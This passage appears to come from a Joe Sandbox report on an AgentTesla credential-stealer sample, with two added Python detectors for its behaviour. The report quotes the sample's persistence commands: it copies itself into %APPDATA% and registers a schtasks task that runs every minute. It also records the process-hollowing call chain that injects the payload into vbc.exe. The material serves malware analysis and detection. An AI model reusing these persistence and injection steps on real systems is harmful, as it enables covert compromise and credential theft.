                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:6
                                                            Start time:17:19:29
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0x7ff756d70000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:8
                                                            Start time:17:19:30
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:9
                                                            Start time:17:19:30
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:10
                                                            Start time:17:19:31
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0x200000
                                                            File size:185856 bytes
                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:11
                                                            Start time:17:19:31
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:12
                                                            Start time:17:19:40
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\excel\excel.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\excel\excel.exe"
                                                            Imagebase:0x1260000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 2%, Metadefender
                                                            • Detection: 0%, ReversingLabs
                                                            Reputation:moderate

                                                            Target ID:13
                                                            Start time:17:19:41
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:16
                                                            Start time:17:19:49
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\excel\excel.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\excel\excel.exe"
                                                            Imagebase:0x1260000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:17
                                                            Start time:17:19:49
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:21
                                                            Start time:17:20:01
                                                            Start date:28/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Imagebase:0x170000
                                                            File size:521216 bytes
                                                            MD5 hash:18E913EC810A1131C23D6FEA7526C4F8
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:.Net C# or VB.NET
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 51%, ReversingLabs

                                                            Target ID:23
                                                            Start time:17:20:43
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            Imagebase:0xc40000
                                                            File size:2688096 bytes
                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                            Target ID:24
                                                            Start time:17:20:47
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:25
                                                            Start time:17:20:48
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:26
                                                            Start time:17:20:48
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:28
                                                            Start time:17:20:50
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:29
                                                            Start time:17:20:50
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            Imagebase:0xd90000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:30
                                                            Start time:17:20:51
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                                                            Imagebase:0x200000
                                                            File size:185856 bytes
                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            Target ID:31
                                                            Start time:17:20:52
                                                            Start date:28/08/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

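The process list above records the persistence chain this AgentTesla build uses: cmd.exe creates %APPDATA%\fghn (Target ID 4), copies the sample there as fghn.exe (Target ID 9), and schtasks registers the task "Nafifas" to run that copy every minute (Target ID 10); on the second run, launched from the copy, the chain repeats and the copy's source and destination are the same file (Target ID 29). The script below is an added example, not part of the Joe Sandbox report or of the sample's code. It scans process records of the shape shown above and raises two findings: a scheduled task whose trigger fires every few minutes and whose target lives in a user-writable directory, and an executable copied into such a directory. The records are constructed from the report's Target IDs 0, 4, 9, 10 and 29 plus one invented benign task as a negative control; the five-minute threshold, the directory list and the rule names are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Process records constructed from this report's process list (Target IDs 0, 4,
# 9, 10 and 29); pid 99 is an invented benign task used as a negative control.
SAMPLE_PROCESSES = [
    {"pid": 0, "image": r"C:\Users\user\Desktop\pdP5Rv9pPW.exe",
     "cmdline": r'"C:\Users\user\Desktop\pdP5Rv9pPW.exe"'},
    {"pid": 4, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn'},
    {"pid": 9, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe'},
    {"pid": 10, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"""schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f"""},
    {"pid": 29, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe'},
    {"pid": 99, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /st 03:00 /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]

# Directories a standard user can write to (assumed list); a task target or copy
# destination under one of these is far more suspicious than one under
# Program Files or System32.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)

# Minutes per unit for the /sc values that take a /mo modifier (subset).
UNIT_MINUTES = {"minute": 1, "hourly": 60, "daily": 1440}
MAX_INTERVAL_MIN = 5  # assumed: a trigger this frequent is treated as persistence

# "copy <src> <dst>" with optional quotes; the report shows cmd lines with the
# leading quote stripped, so the parser never relies on balanced quoting.
COPY_RE = re.compile(r'\bcopy\s+"?([^"]+)"?\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def parse_schtasks(cmdline):
    """Parse a 'schtasks /create' line into schedule, modifier, task name, target
    and the trigger interval in minutes (None for non-periodic schedules).
    Returns None when the line does not create a task."""
    if not re.search(r"\bschtasks(\.exe)?\b.*?/create\b", cmdline, re.IGNORECASE):
        return None

    def opt(flag, pattern):
        m = re.search(rf"/{flag}\s+{pattern}", cmdline, re.IGNORECASE)
        return next((g for g in m.groups() if g is not None), None) if m else None

    schedule = (opt("sc", r"(\w+)") or "").lower()
    modifier = int(opt("mo", r"(\d+)") or 1)
    name = opt("tn", r'(?:"([^"]+)"|(\S+))')
    # the report shows /tr values wrapped as "'path'"; strip any mix of quotes
    target = opt("tr", r"""["']*([^"']+)""")
    unit = UNIT_MINUTES.get(schedule)
    return {"schedule": schedule, "modifier": modifier, "name": name,
            "target": target, "interval_min": unit * modifier if unit else None}


def scan(processes):
    """Apply both rules to every record and return findings in input order."""
    findings = []
    for p in processes:
        cmd = p["cmdline"]
        task = parse_schtasks(cmd)
        if (task and task["target"] and task["interval_min"] is not None
                and task["interval_min"] <= MAX_INTERVAL_MIN
                and USER_WRITABLE.search(task["target"])):
            findings.append(Finding(p["pid"], "schtasks_short_interval_user_dir",
                f'task {task["name"]!r} runs {task["target"]} every {task["interval_min"]} min'))
        m = COPY_RE.search(cmd)
        if m:
            src, dst = m.group(1).strip(), m.group(2).strip()
            if dst.lower().endswith(".exe") and USER_WRITABLE.search(dst):
                findings.append(Finding(p["pid"], "exe_copied_to_user_dir", f"{src} -> {dst}"))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PROCESSES):
        print(f"pid {f.pid:>3}  {f.rule:<34} {f.detail}")
```

Run against the constructed records this yields three findings (pids 9, 10 and 29) and stays silent on the mkdir, the original launch and the daily backup task. Because the sandbox prints the cmd.exe command lines with their opening quote dropped (`cmd" /c ...`), the regexes treat quotes as optional rather than tokenising with shlex; on real telemetry (Sysmon event 1, EDR process-create events) the same rules apply unchanged, and the self-copy on the second run is a useful secondary signal that the task is already in place.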

                                                              Execution Graph

                                                              Execution Coverage:34.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:40.3%
                                                              Total number of Nodes:77
                                                              Total number of Limit Nodes:1
                                                              execution_graph: the rendered node layout is omitted; the call chain it records starts at 0xd5f0a0, passes through 0x4ecaf60 / 0x4ecaf51 and resolves, in order, CreateProcessAsUserA (0xd5f9f5), ReadProcessMemory (0xd5fe40), VirtualAllocEx (0xd5fefb), WriteProcessMemory through the three wrappers at 0x4ebc6f8, 0x4ebc3f2 and 0x4ebc3a0 (call sites 0x4ebc743 and 0x4ebc3a5), SetThreadContext (0xd5fd80) and ResumeThread (0x4ebc811). That is the process-hollowing sequence (create a target, read its image base, allocate and write the payload image into it, redirect the main thread, resume) that lands the AgentTesla payload in vbc.exe.
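The execution graph above is a raw call graph; sandbox signatures turn it into a behaviour label by matching the API calls against an ordered template. The script below is an added example, not part of the Joe Sandbox report or of the sample, showing that matching as an ordered-subsequence test: each signature step is a set of interchangeable API names, and unrelated calls between steps are ignored. The first trace is constructed from the call names and caller addresses visible in the graph above (CreateProcessAsUserA at 0xd5f9f5, ReadProcessMemory at 0xd5fe40, VirtualAllocEx at 0xd5fefb, the WriteProcessMemory call sites at 0x4ebc743 and 0x4ebc3a5, SetThreadContext at 0xd5fd80, ResumeThread at 0x4ebc811); its ordering and the number of writes are my reconstruction, not a recorded trace. The remote-thread and debugger traces, the second signature and the addresses in them are invented for the example.

```python
# Ordered-subsequence matching of Win32 API call traces against injection
# signatures. A trace is a list of (caller_address, api_name) tuples.

SIGNATURES = {
    "process_hollowing": [
        {"CreateProcessA", "CreateProcessW", "CreateProcessAsUserA", "CreateProcessAsUserW"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
        {"ResumeThread", "NtResumeThread"},
    ],
    "remote_thread_injection": [
        {"OpenProcess"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
    ],
}

# Constructed from the call names and addresses in the execution graph above;
# ordering and repetition are a reconstruction for this example.
HOLLOWING_TRACE = [
    (0xd5f9f5, "CreateProcessAsUserA"),
    (0xd5fe40, "ReadProcessMemory"),   # read the target's image base (PEB)
    (0xd5fefb, "VirtualAllocEx"),
    (0x4ebc743, "WriteProcessMemory"),  # headers
    (0x4ebc3a5, "WriteProcessMemory"),  # sections
    (0x4ebc743, "WriteProcessMemory"),
    (0xd5fd80, "SetThreadContext"),
    (0x4ebc811, "ResumeThread"),
]

# Invented: classic remote-thread injection into an already running process.
REMOTE_THREAD_TRACE = [
    (0x401000, "OpenProcess"),
    (0x401020, "VirtualAllocEx"),
    (0x401040, "WriteProcessMemory"),
    (0x401060, "CreateRemoteThread"),
    (0x401080, "CloseHandle"),
]

# Invented: a debugger-style parent that creates a child and reads its memory
# but never writes to it or rewrites its thread context; must match nothing.
DEBUGGER_TRACE = [
    (0x402000, "CreateProcessW"),
    (0x402020, "ReadProcessMemory"),
    (0x402040, "WaitForDebugEvent"),
    (0x402060, "ContinueDebugEvent"),
    (0x402080, "ResumeThread"),
]


def match_sequence(trace, steps):
    """Return the trace indices that satisfy each step in order, or None.
    Greedy earliest matching is sufficient for a subsequence-existence test."""
    matched, pos = [], 0
    for step in steps:
        for i in range(pos, len(trace)):
            if trace[i][1] in step:
                matched.append(i)
                pos = i + 1
                break
        else:
            return None
    return matched


def classify(trace):
    """Map each matching signature name to the calls that satisfied it."""
    hits = {}
    for name, steps in SIGNATURES.items():
        idx = match_sequence(trace, steps)
        if idx is not None:
            hits[name] = [trace[i] for i in idx]
    return hits


def write_count(trace):
    """Number of cross-process writes. Hollowing normally needs several
    (headers, then each section), so a single write is a weaker signal."""
    writes = SIGNATURES["process_hollowing"][2]
    return sum(1 for _, api in trace if api in writes)


if __name__ == "__main__":
    for label, trace in [("graph", HOLLOWING_TRACE), ("remote", REMOTE_THREAD_TRACE),
                         ("debugger", DEBUGGER_TRACE)]:
        hits = classify(trace)
        print(label, sorted(hits), "writes:", write_count(trace))
        for name, calls in hits.items():
            print("  ", name, "->", " > ".join(f"{api}@{addr:x}" for addr, api in calls))
```

Two caveats a practitioner would want. A name-only trace cannot see that the child was created with CREATE_SUSPENDED or that the write targets the child rather than some other handle, so on a real API monitor the arguments (creation flags, the process handle reused across alloc, write and context calls) should be matched as well. The signature also deliberately does not require NtUnmapViewOfSection: the graph here shows a ReadProcessMemory before the allocation rather than an unmap, and hollowing variants differ on that step, so requiring it would miss this sample.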

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4ed6fe5-4ed6fec, common exit block 4edae52-4edae58.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380895325.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ed0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: l@
                                                              • API String ID: 0-4249425015
                                                              • Opcode ID: 4fafe060537d5f0cce44cb501b3024915012508bd48dc62c8648bd3686c606f9
                                                              • Instruction ID: 9aa14a1363ea0a861beaa68180f5dc11a2240566b385ec8d2b36d770004e4eb8
                                                              • Opcode Fuzzy Hash: 4fafe060537d5f0cce44cb501b3024915012508bd48dc62c8648bd3686c606f9
                                                              • Instruction Fuzzy Hash: 1D734B70E091188FCB54EF39E98969DBBB1FB49205F0145EAD44CA3754DB386E88CF1A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block d52c4d-d52c82, common exit block d5805f-d5809e; one call to d501ec.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e1c3ed08e6ac427e5bd968e9982a63b6a6cc208ce88d6144fd27fcc6fd783b7
                                                              • Instruction ID: c0c3cd4232eb10582d55586eb43aac87865974c5744bc2f10c437686bb4ac695
                                                              • Opcode Fuzzy Hash: 4e1c3ed08e6ac427e5bd968e9982a63b6a6cc208ce88d6144fd27fcc6fd783b7
                                                              • Instruction Fuzzy Hash: 7EA35A70E096188BCB54EF29DD85799BBB1FB49305F0045EAD448A3B54DF346E88CF2A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4ef5d48-4ef5e77, common exit block 4efb0f1-4efb0fd.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380992110.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ef0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26102b660fc8de8ce293ed9f01ca5b1c2c2c332538ea0c2f9e166d081b494050
                                                              • Instruction ID: 45eb1b3769476d25f17813a93dc85e50dfffc4d3e2958934a81ed4533f0b8963
                                                              • Opcode Fuzzy Hash: 26102b660fc8de8ce293ed9f01ca5b1c2c2c332538ea0c2f9e166d081b494050
                                                              • Instruction Fuzzy Hash: 60A3F970E191188FCB14EF29D9896ADB7B1FB89305F0045EAD44CA7B54DB386E88CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4ee0040-4ee0166, common exit block 4ee4b93-4ee4be2.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380942576.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ee0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe4f26e22c2c721c5618540bb7b21a49f48ffbd759d4486bf577c07fe20c34ad
                                                              • Instruction ID: 60f21994205983000030d326ed65f42d74d35c1f3057eaf0b965ec137efce6bf
                                                              • Opcode Fuzzy Hash: fe4f26e22c2c721c5618540bb7b21a49f48ffbd759d4486bf577c07fe20c34ad
                                                              • Instruction Fuzzy Hash: 04A38170E042288FC759EF29DD856ADBBB1FB89305F0044EAD488A7755DB385E88CF46
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4ee5bc8-4ee5cd0, common exit block 4eea7d4-4eea7e4.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380942576.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ee0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90bd0bb3c1dba39eead31ec7c8370dfa2cf57f195cd27cfbf4a52aec85ca6e60
                                                              • Instruction ID: 1b99a3b80faebf18901641764350d915681d2da8f1dc96fd323ad3d51edace0b
                                                              • Opcode Fuzzy Hash: 90bd0bb3c1dba39eead31ec7c8370dfa2cf57f195cd27cfbf4a52aec85ca6e60
                                                              • Instruction Fuzzy Hash: A8A36F70E44128CFC759EF29D9896ACBBB2FB49301F0045EAD488A7715DB386E98CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4eb5cf0-4eb5d5e, common exit block 4eba815-4eba826; one call to 4eb58e0.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53cec318e39947ff80ecc5bc2bb76ff9029adb833d3adc527324fd66e2b712eb
                                                              • Instruction ID: 3a0dcce0264a7e9c79aa7f554e421467c2342c759dc27d4091a3bb67d95ddc41
                                                              • Opcode Fuzzy Hash: 53cec318e39947ff80ecc5bc2bb76ff9029adb833d3adc527324fd66e2b712eb
                                                              • Instruction Fuzzy Hash: 7A934E70E04228CFCB99EF29D9956ADBBB2FB49301F0044E9D488A7715DB346E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4eb0040-4eb015c, common exit block 4eb4a53-4eb4a76.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daab2b3a4fd2bff44e2a8d5d0be6e781fdcc79512de8e203765c718710c2fce8
                                                              • Instruction ID: 26bea5f13c320db5db97e366487129d190e8b6070216d5de6fb48ad2512d63ce
                                                              • Opcode Fuzzy Hash: daab2b3a4fd2bff44e2a8d5d0be6e781fdcc79512de8e203765c718710c2fce8
                                                              • Instruction Fuzzy Hash: 12934D70E04128CFCB59EF29D9856ADBBB1FB89305F0045E9D488A3755DB386E88CF46
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              (interactive graph rendering; executed / not-executed basic-block data omitted). Entry block 4ecaf60-4ecb23d, exit block 4ecf5d7-4ecf5e4. Calls: d5f968 (CreateProcessAsUserA), d5fd38 (SetThreadContext), d5fdf8 (ReadProcessMemory), d5feb8 (VirtualAllocEx), 4ebc6f8 / 4ebc3f2 / 4ebc3a0 (WriteProcessMemory), 4ebc7c8 / 4ebc7d0 (ResumeThread).
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380799620.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ec0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48e2d121749042f059f2dbb81c31f75960728c6da0ed21b70f8373b1a2f67e62
                                                              • Instruction ID: 0cc09b9439fe54b51dfe839d977ab6bb66199bcc07794cf3548a5e947c2b4297
                                                              • Opcode Fuzzy Hash: 48e2d121749042f059f2dbb81c31f75960728c6da0ed21b70f8373b1a2f67e62
                                                              • Instruction Fuzzy Hash: 8C835B70A052188BCB54EF39DD8979EB7B2FB89304F0044AAD488A3754DF396D99CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Rendered graph omitted. Function 4ecaf51-4ecf5e4 (an alternate entry, fifteen bytes before 4ecaf60, into the same body): identical block structure, with calls to d5f968, d5fd38 (two sites), d5fdf8 and d5feb8; call sites 4ecd7ec, 4ece382 and 4ecea9a each record the targets 4ebc6f8, 4ebc3f2 and 4ebc3a0; site 4ecf36e records the targets 4ebc7c8 and 4ebc7d0.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380799620.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ec0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54544457bd500011631aabe3d426db7d8aaa782a9b2dc42f3e6c258306c00c6b
                                                              • Instruction ID: 12cc66aa728d8e3fa1b913d778ad1c46a444b09509c4882ea5a1054d8627a080
                                                              • Opcode Fuzzy Hash: 54544457bd500011631aabe3d426db7d8aaa782a9b2dc42f3e6c258306c00c6b
                                                              • Instruction Fuzzy Hash: 37835B70A052188BCB54EF39DD8979EB7B2FB89304F0044AAD488A3754DF396D99CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D5FBF8
